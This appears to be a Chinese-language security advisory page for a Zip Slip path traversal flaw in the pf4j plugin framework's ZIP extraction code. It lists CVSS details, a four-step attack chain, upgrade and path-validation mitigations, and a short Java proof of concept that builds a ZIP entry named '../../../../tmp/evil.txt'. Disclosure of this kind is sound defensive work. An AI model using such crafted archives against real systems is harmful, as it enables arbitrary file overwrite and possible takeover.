CVE-2025-70952 CVSS 7.5 高危

CVE-2025-70952 pf4j路径遍历漏洞

披露日期: 2026-03-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-70952

漏洞类型

路径遍历 (Zip Slip)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

pf4j

漏洞概述

pf4j在20c2f80提交之前的版本中存在路径遍历漏洞。该漏洞源于Unzip.java文件的extract()函数在处理ZIP条目名称时，未实施有效的路径规范化和验证机制。攻击者可利用此缺陷，通过精心构造的恶意ZIP文件实施目录遍历或Zip Slip攻击。成功利用该漏洞可能导致文件被覆盖或任意文件写入，进而影响系统服务的可用性。

技术细节

该漏洞位于pf4j插件框架的核心解压逻辑中，具体影响了Unzip.java类的extract()函数。在处理ZIP文件条目时，该函数未对文件名进行严格的路径规范化检查和安全验证，例如未检测文件名中是否包含"../"跳转符或以绝对路径开头。当应用程序使用受影响版本的pf4j加载并解压恶意的插件ZIP文件时，攻击者可以精心构造包含特殊路径字符的文件名。这会导致解压过程将文件写入预期的插件目录之外，从而实施Zip Slip攻击。由于CVSS向量显示攻击无需认证且无需用户交互，若远程攻击者能控制上传内容或诱导应用加载恶意ZIP，即可利用该漏洞覆盖系统关键文件或写入恶意数据，导致拒绝服务或潜在的安全风险。

攻击链分析

STEP 1

步骤1：构造恶意ZIP

攻击者创建一个特制的ZIP文件，其中包含带有路径遍历字符（如../）的文件名，旨在将文件解压到目标目录之外。

STEP 2

步骤2：传递载荷

攻击者将恶意ZIP文件上传为目标插件，或通过其他方式诱导应用程序使用pf4j加载并解压该文件。

STEP 3

步骤3：触发漏洞

应用程序调用Unzip.java中的extract()函数解压ZIP。由于缺乏路径验证，程序将文件名拼接在解压目录后，实际写入路径跳出了预期目录。

STEP 4

步骤4：达成利用

恶意文件被写入系统敏感位置（如覆盖配置文件或写入可执行脚本），导致拒绝服务或进一步的控制权获取。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import java.io.*;
import java.util.zip.*;

public class ZipSlipPoC {
    public static void main(String[] args) throws IOException {
        // Create a malicious zip file
        String maliciousZipPath = "malicious.zip";
        FileOutputStream fos = new FileOutputStream(maliciousZipPath);
        ZipOutputStream zos = new ZipOutputStream(fos);

        // The entry name contains '../' to traverse directories
        // This attempts to write 'evil.txt' to the parent directory of the extraction point
        String entryName = "../../../../tmp/evil.txt";
        ZipEntry entry = new ZipEntry(entryName);
        zos.putNextEntry(entry);

        // Content of the malicious file
        String content = "This file was written via Zip Slip vulnerability.";
        zos.write(content.getBytes());
        zos.closeEntry();

        zos.close();
        System.out.println("Malicious ZIP file created at: " + maliciousZipPath);
    }
}

影响范围

pf4j < commit 20c2f80

防御指南

临时缓解措施

建议立即升级pf4j库。若无法立即升级，应在业务代码中拦截插件加载请求，或修改解压逻辑，确保解析后的文件路径以预期的根目录开头，防止目录遍历。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表